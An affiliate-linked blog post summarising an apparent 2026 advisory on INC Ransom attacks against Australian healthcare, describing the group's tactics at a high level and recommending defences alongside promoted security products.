Australian Hospitals Under Fire: The INC Ransom Threat Targeting Healthcare in 2026

A joint advisory from Five Eyes intelligence agencies — including Australia's own ACSC — has confirmed that ransomware gang INC Ransom is actively targeting Australian hospitals and healthcare providers. With at least 11 confirmed incidents in Australia already, the threat is real, escalating, and demands urgent action.

Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.

A Warning From Five Eyes

In March 2026, Australia's Cyber Security Centre (ACSC) joined with the New Zealand National Cyber Security Centre (NCSC-NZ) and Tonga's CERT to issue a coordinated advisory about INC Ransom — a ransomware-as-a-service (RaaS) operation that has been systematically targeting healthcare and professional services organisations across the Pacific region.

The advisory documented at least 11 INC Ransom-related incidents responded to by the ACSC between July 2024 and December 2025, with the healthcare sector bearing the brunt of attacks. Since January 2025, the ACSC has observed a marked acceleration in INC Ransom affiliates specifically targeting Australian health care entities. This is not a distant threat — it is happening in hospitals right now.

INC Ransom is also tracked by threat intelligence firms under the aliases Tarnished Scorpion and GOLD IONIC, and has been active since 2023. The group operates a franchise model: a core development team builds and maintains the ransomware infrastructure, then leases access to affiliates who conduct the actual attacks in exchange for a cut of ransom payments. This model has proven devastatingly effective at scaling operations globally.

Why Is Australian Healthcare Being Targeted?

Healthcare organisations are uniquely attractive to ransomware operators for several reasons. Patient records — containing Medicare numbers, prescription histories, surgical records, and billing details — fetch high prices on criminal marketplaces. More critically, hospitals cannot simply shut down their systems and wait out an attack: disrupted patient care creates life-threatening urgency that pressures organisations to pay ransoms quickly, often without negotiating.

Australia's healthcare sector has also been grappling with a rapid shift to digitised patient records, connected medical devices, and cloud-based administrative systems. This expanded digital footprint, combined with historically underfunded IT and cybersecurity budgets in the public health system, creates a larger attack surface than most industries.

The sector has already been scarred by high-profile incidents. The 2024 MediSecure breach exposed the prescription data of approximately 12.9 million Australians — nearly half the country's population. Fertility provider Genea confirmed hackers accessed sensitive patient data in early 2025. St. Vincent's Health Australia, one of the country's largest non-profit hospital networks, suffered a significant cyberattack that exposed decades of patient records. INC Ransom affiliates are now hunting in the same territory, with a more sophisticated and targeted methodology.

How INC Ransom Attacks Work

Getting In: Compromised Credentials

The ACSC advisory reveals that INC Ransom affiliates most commonly gain initial access through compromised user accounts — specifically targeting remote access tools and VPN gateways used by healthcare workers. Staff logging in from home, clinics, or satellite facilities represent an entry point that is difficult to monitor and easy to exploit when credentials have been stolen or guessed.

Once inside, affiliates escalate privileges by creating new administrator-level accounts, giving them persistent, hard-to-detect footholds even if the original compromised account is later locked out. This is why strong, unique passwords and multi-factor authentication are not optional extras in healthcare environments — they are foundational defences.

If your organisation or its staff reuse passwords across systems, or rely on simple, guessable credentials for remote access portals, you are operating with an unlocked front door. A dedicated password manager like NordPass can enforce unique, complex credentials across every system — eliminating the weak-link problem of human password habits at scale. NordPass Business also offers an organisational dashboard to identify and remediate weak or shared passwords across a team.

Moving Through Networks: Living Off the Land

After establishing a foothold, INC Ransom affiliates do not deploy flashy custom malware that triggers antivirus alerts. Instead, they practise what security professionals call "living off the land" — using legitimate, trusted tools already present on the network to move laterally and exfiltrate data.

The ACSC advisory specifically identified the use of 7-Zip (to compress and package stolen data) and rclone (to transfer that data to attacker-controlled cloud storage) as key tools in INC Ransom campaigns. Because these are legitimate, widely-used utilities, traditional signature-based security tools often miss them entirely. Detection requires behavioural monitoring — watching for unusual patterns of activity rather than known-bad files.

Double Extortion: Pay Twice or Lose Everything

INC Ransom employs a double extortion model. First, they encrypt the victim's files, rendering systems inoperable. Second — and this is the part that makes paying the ransom alone insufficient — they exfiltrate sensitive data before encryption and threaten to publish it on their public leak site unless an additional payment is made.

This means even an organisation with excellent backups that can restore systems without paying the encryption ransom still faces the threat of patient data being dumped publicly. Healthcare providers operate under strict obligations under the Privacy Act 1988 and the Notifiable Data Breaches scheme, making the prospect of a data dump especially damaging — financially, legally, and reputationally.

Web-Facing Systems: The Other Attack Vector

INC Ransom is not the only threat actor exploiting Australian healthcare right now. Security researchers have documented Storm-1175, a separate threat actor group that specifically targets web-facing systems — patient portals, appointment booking platforms, telehealth interfaces, and public-facing web applications — as entry points for ransomware deployment.

This makes the security of web-facing systems just as critical as internal network defences. A hospital patient portal with an unpatched vulnerability or a misconfigured web application firewall can hand attackers an entry point that bypasses perimeter security entirely.

For organisations running websites and web applications as part of their healthcare delivery or administration, a web application firewall (WAF) and continuous malware scanning service like Sucuri provides a critical layer of protection. Sucuri's WAF filters malicious traffic before it reaches your server, while its monitoring service detects injected malware, defacements, and suspicious behavioural patterns in real time.

What Healthcare Organisations Must Do Right Now

The ACSC advisory does not pull its punches. It outlines a series of critical controls that all healthcare organisations — from large public hospital networks to small private practices — should implement immediately. Here is a practical breakdown:

1. Harden Remote Access

Since compromised remote access credentials are INC Ransom's primary entry point, securing every remote connection is the highest-priority action. Enforce multi-factor authentication (MFA) on all VPN connections, remote desktop sessions, and cloud application logins without exception. Consider deploying a zero-trust network access model, where every connection is verified regardless of location.

For staff connecting to clinical systems from home or satellite locations, a business-grade VPN like NordVPN encrypts all traffic in transit, making it significantly harder for attackers to intercept credentials or session tokens. NordVPN's Threat Protection feature also blocks known malicious domains at the connection level — stopping many phishing and malware delivery attempts before they reach the user's device.

2. Implement Privileged Access Controls

INC Ransom affiliates escalate privileges by creating new admin accounts. Organisations should implement a least-privilege model — users only have the permissions they need for their role — and set alerts for the creation of new administrator accounts. Privileged access management (PAM) tools can enforce approval workflows for any privilege elevation, adding a chokepoint that attackers find difficult to bypass silently.

3. Monitor for Lateral Movement

Deploy security information and event management (SIEM) tooling or engage a managed detection and response (MDR) provider who can identify the behavioural signatures of lateral movement — unusual rclone activity, large outbound data transfers, unexpected use of 7-Zip on server infrastructure. Many healthcare organisations lack the internal security operations capacity to detect these patterns; outsourcing detection to a specialist is a pragmatic alternative.

4. Maintain Tested Offline Backups

Backups are only useful if they are offline (disconnected from the network so ransomware cannot encrypt them too), current, and regularly tested. The ACSC recommends following the 3-2-1 backup rule: three copies of data, on two different media types, with one stored offsite. Critically, restore tests should be conducted regularly — discovering that backups are corrupted or incomplete during an active incident is a catastrophic outcome.

5. Patch and Update Consistently

Many ransomware campaigns exploit known, publicly-disclosed vulnerabilities in systems that have not been patched. Healthcare IT teams should prioritise patching of internet-facing systems and remote access infrastructure. The ACSC's alerts and advisories page provides up-to-date guidance on actively exploited vulnerabilities — it should be on every IT team's daily reading list.

What Should Patients Do?

If you receive notification that a healthcare provider has suffered a data breach — or if you suspect your health data may have been compromised — take these steps immediately:

• Change your passwords for any online healthcare portals, My Health Record, and any accounts where you used the same password as your healthcare provider login. Use a password manager to generate and store unique credentials for every service.
• Monitor for phishing attempts. Stolen patient data is often used to craft targeted phishing emails that reference your real medical history to appear credible. Be sceptical of any unsolicited email or SMS purporting to be from a healthcare provider, Medicare, or the ATO referencing your health records.
• Consider a credit monitoring service if the breach involved financial or identity information such as Medicare numbers, tax file numbers, or billing details. Your identity could be used to fraudulently claim health services or access government benefits.
• Report suspicious activity to the ACSC's ReportCyber portal and to the Office of the Australian Information Commissioner (OAIC) if you believe your health data has been misused.

The Bigger Picture: Healthcare Cybersecurity Cannot Wait

The INC Ransom advisory is a stark reminder that Australian healthcare is squarely in the crosshairs of sophisticated, well-resourced criminal organisations. The franchise model of ransomware-as-a-service means the pool of potential attackers grows constantly — any aspiring criminal can rent access to proven ransomware infrastructure and target a hospital with relatively little technical expertise.

Successive Australian governments have increased investment in national cybersecurity capability, and the ACSC's proactive advisory work is genuinely valuable. But the front line of defence sits within individual healthcare organisations — their IT teams, their clinical staff, and the security practices embedded in their day-to-day operations.

The cost of a ransomware attack on a hospital — in ransom payments, system recovery, regulatory penalties, reputational damage, and most importantly, the potential impact on patient care — vastly exceeds the cost of preventative security measures. The question is not whether Australian healthcare can afford to invest in cybersecurity. It is whether it can afford not to.